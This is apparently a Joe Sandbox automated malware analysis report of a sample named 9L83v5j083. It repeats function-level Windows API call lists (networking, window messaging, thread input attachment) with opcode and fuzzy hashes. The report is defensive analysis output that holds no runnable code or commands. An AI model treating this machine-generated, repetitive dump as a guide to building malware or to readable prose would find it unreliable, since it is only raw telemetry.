                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                                  • String ID: cdecl
                                                                                                                  • API String ID: 3850814276-3896280584
                                                                                                                  • Opcode ID: be950148230c51df3d916308251938558a005e8a5716176175899a18a78dbff8
                                                                                                                  • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                                  • Opcode Fuzzy Hash: be950148230c51df3d916308251938558a005e8a5716176175899a18a78dbff8
                                                                                                                  • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                  • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                                  • _memmove.LIBCMT ref: 0046D475
                                                                                                                  • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2502553879-0
                                                                                                                  • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                  • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                                  • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                  • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32 ref: 00448C69
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                                  • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                                  • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$LongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 312131281-0
                                                                                                                  • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                  • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                                  • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                  • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                                  APIs
                                                                                                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                                  • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastacceptselect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 385091864-0
                                                                                                                  • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                  • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                                  • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                  • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                  • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                                  • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                  • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1358664141-0
                                                                                                                  • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                  • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                                  • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                  • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2880819207-0
                                                                                                                  • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                  • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                                  • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                  • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                                  APIs
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                                  • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 357397906-0
                                                                                                                  • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                  • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                                  • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                  • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                                  APIs
                                                                                                                  • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                  • __wsplitpath.LIBCMT ref: 00433950
                                                                                                                  • __wcsicoll.LIBCMT ref: 00433974
                                                                                                                  • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1187119602-0
                                                                                                                  • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                  • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                                  • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                  • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1597257046-0
                                                                                                                  • Opcode ID: d382d6cf353e2d9809c5dbd4d41045a579dfd79ee8a2deeb526b36df9746b3bf
                                                                                                                  • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                                  • Opcode Fuzzy Hash: d382d6cf353e2d9809c5dbd4d41045a579dfd79ee8a2deeb526b36df9746b3bf
                                                                                                                  • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                                  • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 237123855-0
                                                                                                                  • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                  • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                                  • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                  • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteDestroyObject$IconWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3349847261-0
                                                                                                                  • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                  • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                                  • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                  • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                                  APIs
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2223660684-0
                                                                                                                  • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                  • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                                  • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                  • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                                  • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                                  • EndPath.GDI32(?), ref: 00447336
                                                                                                                  • StrokePath.GDI32(?), ref: 00447344
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2783949968-0
                                                                                                                  • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                  • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                                  • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                  • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                                  APIs
                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                  • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
